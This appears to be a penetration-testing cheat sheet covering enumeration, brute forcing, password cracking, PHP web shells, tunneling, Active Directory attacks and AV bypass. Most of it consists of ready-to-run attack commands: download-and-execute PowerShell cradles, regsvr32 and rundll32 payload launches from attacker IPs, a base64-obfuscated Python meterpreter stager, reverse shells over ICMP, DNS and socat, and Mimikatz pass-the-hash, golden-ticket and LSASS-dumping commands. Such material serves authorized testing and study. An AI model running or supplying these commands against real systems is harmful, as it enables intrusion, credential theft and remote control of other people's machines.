Home

Awesome

<b>Table of Contents</b>


<a name="enumeration"></a><h2> Enumeration </h2>

<a name="genumeration"></a><h3>Generic Enumeration</h3>

<a name="httpenumeration"></a><h3> HTTP Enumeration</h3>

<a name="sshenumeration"></a><h3>SSH Enumeration</h3>

<a name="smbenumeration"></a><h3>SMB Enumeration</h3>

<a name="snmpenumeration"><h3> SNMP Enumeration</h3>

<a name="explotation"></a><h2> Explotation </h2>

<a name="bof"></a><h3> BOF exploit-based </h3>

<a name="weakcreds"></a><h3> Weak Credentials </h3>

<a name="httpbrute"></a><b> HTTP Brute Force </b>

wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php

hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20

wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api

wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/

<a name="passcrack"></a><b> Password Cracking </b>

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

<pre> unshadow passwd shadow > passwords john --wordlist=/usr/share/wordlists/rockyou.txt passwords </pre> <pre> keepass2john /root/Desktop/NewDatabase.kdb > file john -incremental:alpha -format=keepass file </pre> <pre> for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done </pre> <pre>openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends</pre>

<a name="rce"></a><h2> RCE </h2>

<a name="phprce"></a><h3>PHP RCE</h3>

test:

<?php phpinfo(); ?>

simple shell:

<?php system($_GET["c"]); ?>

<?php `$_GET["c"]`; ?>

file upload:

<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>

file upload evasion: rot13 + urlencode

<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/test8.php', str_rot13(urldecode($payload))); ?>

<a name="rcewebshell"></a><h3>RCE via webshell</h3>

<a name="rcewmic"></a><h3>RCE via WMIC</h3>

Powershell without powershell:

Generate payload with web_delivery

powershellless1

Encode Payload

powershellless2

Include payload in xsl file

powershellless3

<pre>wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"</pre>

powershellless4

<a name="lolbins"></a><h3>LOLBINS</h3>

<b>SyncAppvPublishingServer</b>

<pre>SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX"</pre>

lolbin1

<b>rundll32</b>

<pre>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll")</pre>

<a name="privesc"></a><h2> Privilege Escalation</h2>

<a name="linux"></a><h3> Linux Privilege Escalation </h3>

<a name="windows"></a><h3> Windows Privilege Escalation </h3>

<a name="kernel"></a><h3> Kernel Exploits </h3>

Linux: https://github.com/lucyoa/kernel-exploits

Windows: https://github.com/abatchy17/WindowsExploits

<a name="tunneling"></a><h2>Tunneling & Port Forwarding</h2>

<a name="sshovertcp"></a><h3>SSH over HTTP (Squid)</h3>

<b> socat </b>

<pre>socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128 ssh john@127.0.0.1 -p 9999</pre>

<b>proxytunnel </b>

<pre>proxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555 ssh john@127.0.0.1 -p 5555</pre>

<b>proxychains </b>

<pre>http 192.168.1.41 3128 proxychains ssh john@127.0.0.1</pre>

proxychains

<b>corkscrew </b>

<pre>ssh john@192.168.1.41 -t /bin/sh</pre>

cork

<a name="tcpoverhttp"></a><h3> TCP over HTTP </h3>

For this technique, it is necessary to be able to upload a file to a webserver.

<a name="regeorg"><b> 1. reGeorg </b>

File upload to the server correct

regeorge2

Tunnel creation

python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"

Proxychains config

regeorge1

<pre> proxychains nmap -F -sT 127.0.0.1 proxychains mysql -u root -p -h 127.0.0.1 proxychains ssh localhost </pre>

regeorge3

Reference: https://sensepost.com/discover/tools/reGeorg/

<a name="abptts"><b> 2. ABBTTS </b>

Upload File

abbtts5

Config proxychains and create the tunnel

python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22

Usage

ssh -p 22222 user@127.0.0.1

abbtts7

Reference: https://github.com/nccgroup/ABPTTS

<a name="httpredirectors"><h3>HTTP Redirectors</h3>

<a name="socatred"><b> 1. socat </b>

<pre>socat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80</pre>

socatt

<a name="iptablesred"><b> 2. iptables </b>

<pre>iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1</pre>

iptables

<a name="windowsocks"></a><h3> Windows Socks Proxy </h3>

In this case this is going to be used to access Burp listening on a Windows NATed VM from other PCs in the same network as the Windows Host.

From the Windows Host machine (IP: 192.168.1.206)

<pre> Import-Module .\Invoke-SocksProxy.psm1 Invoke-SocksProxy -bindPort 1234 </pre>

invokesocks

From other PC on the Windows Host machine network (IP: 192.168.1.69)

Configure proxychains.conf:

<pre> socks4 192.168.1.206 1234 </pre> <pre>proxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:192.168.48.158:8080</pre>

This command ahead makes Burp (which is listening on the NATed machine) accessible from 192.168.1.69 on port 8081

Now, configure the Proxy in the browser:

proxyconf

All the traffic is logged on the NATed machine Burp.

Reference: https://github.com/p3nt4/Invoke-SocksProxy

<b> Chisel </b>

Attacker

<pre> ./chisel_1.7.1_linux_amd64 server -p 8000 --reverse </pre>

Victim

<pre> .\chisel.exe client 37.187.112.19:8000 R:socks </pre>

Attacker

<pre> proxychains nmap -sT --top-ports --open 10 127.0.0.1 </pre>

chisel

References: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

<a name="poor"></a><h3> Man's Poor VPN </h3>

Traffic forward over SSH without needing to ssh -D <port>

<pre>sshuttle -vr user@192.168.207.57 1X0.1X.0.0/16</pre>

sshuttle

Proof:

mantis2

Reference: http://teohm.com/blog/using-sshuttle-in-daily-work/

<a name="windowsad"></a><h2> Windows AD Environment </h2>

<a name="applocker"></a><h3> Bypass Applocker </h3>

<b>1. rundll32</b>

rundll32.exe PowerShdll.dll,main

applocker

Reference: https://github.com/p3nt4/PowerShdll

<b>2. Alternative powershell files</b>

applocker2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise

<a name="pth"></a> <h3> Pass The Hash </h3>

<b> Invoke a command Remotely </b>

<pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1') Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell whoami | out-file \\SVHOST2\C$\windows\bitch.txt" </pre>

<b> Invoke Mimikatz Remotely </b>

<pre>Invoke-WMIExec -Target SVHOST2 -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "powershell -Enc SQBFA...AoA"</pre>

image

<b> Pass The Hash with Mimikatz </b>

<pre> Invoke-Mimikatz -Command '"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli"'</pre>

<a name="krb"></a><h3> Kerberos </h3>

<b> Generate Golden Ticket (Domain Admin Required) </b>

<pre>Invoke-Mimikatz -Command '"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt"'</pre>

image

image

<pre>Invoke-Mimikatz -Command '"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa /sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt"</pre>

image

<pre>Invoke-Mimikatz -Command '"kerberos::ptt admin.kirbi"'</pre>

image

image

<a name="miscwin"></a><h3> Miscellaneous </h3>

<b> Invoke Mimikatz </b>

<pre>IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz</pre>

<b> Mimikatz C# </b>

<pre>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs</pre>

https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7

In case compiler is outdated:

<pre>nuget install Microsoft.Net.Compilers</pre>

<b> Runas Powershell </b>

Start-Process powershell.exe -Verb runas Start-Process powershell.exe -Credential <user>

<b> View Shares With Permissions </b>

<pre>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess"</pre>

image

<b> View files that contain certain words recursively </b>

<pre> ls -Path \\SVHOST1.LAZULI.CORP\tmp$ -Include "*pass*","* admin*","*secret*" -Recurse -ErrorAction SilentlyContinue</pre>

image

<b> View files which name contains certain words recursively </b>

<pre>dir -Path \\SVHOST1.LAZULI.CORP -Include "*pass*","*admin*","*secret*" -Recurse -ErrorAction SilentlyContinue</pre>

image

<b> Connect to MSSQL Database </b>

<pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1') Invoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password <password> -Query "exec sp_databases" </pre>

<b> Port Scanning </b>

<pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1') Invoke-Portscan -Hosts [ip] -TopPorts 50</pre>

image

<b> View Domain Admins </b>

<pre> net groups /domain "Domain Admins"</pre>

image

<b> View Domain Controlers </b>

<pre>nltest /dclist:<domain> </pre>

image

<b> Get Hashes </b>

<pre>IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes</pre>

image

<b> Check Pass The Hash with multiple servers</b>

<pre>$hosts = @("SVDC1.LAZULI.CORP","SVFILES.LAZULI.CORP","SVHOST1.LAZULI.CORP","SVHOST2.LAZULI.CORP","SVFILES2.LAZULI.CORP") foreach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command "hostname" -Verbose } </pre>

image

<b> Run web_delivery with other identity </b>

<pre> runas-cabesha-webdelivery -url [url_webdelivery] -user [url] -pass [pass] </pre>

cabesha

References: https://www.hacklikeapornstar.com/

<a name="revshells"></a><h2> Reverse Shells </h2>

<a name="dns"></a><h3> Reverse DNS Shell with dnscat powershell </h3>

<b> Server </b>

<pre>ruby dnscat2.rb -e open --no-cache tunnel.domain.com</pre>

<b> Client </b>

<pre>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 </pre>

dns

Reference: https://github.com/lukebaggett/dnscat2-powershell

<a name="icmp"></a><h3> Reverse ICMP shell </h3>

<b> Server </b>

<pre> sysctl -w net.ipv4.icmp_echo_ignore_all=1 python icmpsh_m.py [IP atacante] [IP victima] </pre>

<b> Client </b>

<pre>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]</pre>

icmpreverseshell

<b> Native ICMP shell </b>

<pre> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}" </pre>

Reference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/

<a name="httpproxy"></a><h3> Reverse HTTP Shell through Proxy </h3>

<pre>use payload/python/meterpreter/reverse_http</pre>

proxy2

python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))"

Finally we set up the handler:

proxy3

<a name="misc"></a><h2> Miscellaneous </h2>

<a name="interactiveshell"></a><h3> Interactive Reverse Shell </h3>

<b> Method 1 </b>

Attacker:

socat file:`tty`,raw,echo=0 TCP-L:4444

Victim:

wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444

Socat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

<b> Method 2 </b>

In reverse shell

<pre> python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z </pre>

In kali

<pre> echo $TERM stty -a stty raw -echo fg </pre>

In reverse shell

<pre> reset export SHELL=bash export TERM=xterm-256color stty rows <num> columns <cols> bash </pre>

<a name="jailescape"></a><h3>rbash Jail Escape</h3>

<b>RequestTTY no</b>

<pre>ssh -o RequestTTY=no user@ip</pre>

ttyno

and the result would be:

ttyfalse2

<b>Bash --noprofile</b>

<pre>ssh monitor@127.0.0.1 -t "bash --noprofile" </pre>

bashnoprofile

<a name="windowstransfer"></a><h3> Windows File Transfer </h3>

<b>bitsadmin</b>

bitsadmin /transfer debjob /download /priority normal http://<ip>/shell.php c:\xampp\htdocs\shell.php

<b>cscript wget.vbs (code on the repo)</b>

cscript wget.vbs http://<ip>/test.txt test.txt

<b>powershell</b>

powershell -c "(new-object System.Net.WebClient).Downloadfile('http://<ip>/exploit.exe', 'C:\Windows\temp\exploit.txt')"

<b>ftp</b>

client:

<pre> echo open [ip] [port] > ftpscript.txt echo anonymous>> ftpscript.txt echo PASS >> ftpscript.txt echo bin >> ftpscript.txt echo get meter.exe>> ftpscript.txt echo quit >> ftpscript.txt ftp -s:ftpscript.txt </pre>

server:

<code>python -m pyftpdlib --port=2121 --write</code>

<b>wget.exe</b>

Upload to vulnerable server from kali: /usr/share/windows-binaries/wget.exe

wget.exe http://<ip>/file file

<b> certutil </b>

certutil -urlcache -split -f https://<ip>/file.txt file.txt

<a name="vpnrestrict"></a><h3> Bypass VPN routing restrictions </h3>

<pre>openconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68’</pre>

vpn1

Reference: https://github.com/dlenski/vpn-slice

<a name="avbypass"></a><h3>AV Bypass</h3>

<b> Lsass Dump </b>

<pre> certutil.exe -urlcache -f https://raw.githubusercontent.com/adon90/pentest_compilation/master/PostExplotation/mimi.vbs C:\Windows\temp\mimi.vbs cscript mimi.vbs lsass.exe pypykatz lsa minidump lsass.bin | tee -a dump1.txt </pre>

References: https://esmyl.medium.com/windows-memory-dump-cheat-sheet-23f32079304a

<b> SharpSploit </b>

<pre> Start-Process "powershell" "unblock-file .\SharpSploit.dll" Add-Type -Path .\SharpSploit.dll [SharpSploit.Execution.Shell]::ShellExecute("regsvr32 /s /n /u /i:http://192.168.48.151:9999/QuHBoZ.sct scrobj.dll") </pre>

sharpsploit

References: https://cobbr.io/SharpSploit.html

<b> Workflow.Compiler </b>

<pre> C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml </pre>

workflow

References:

https://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb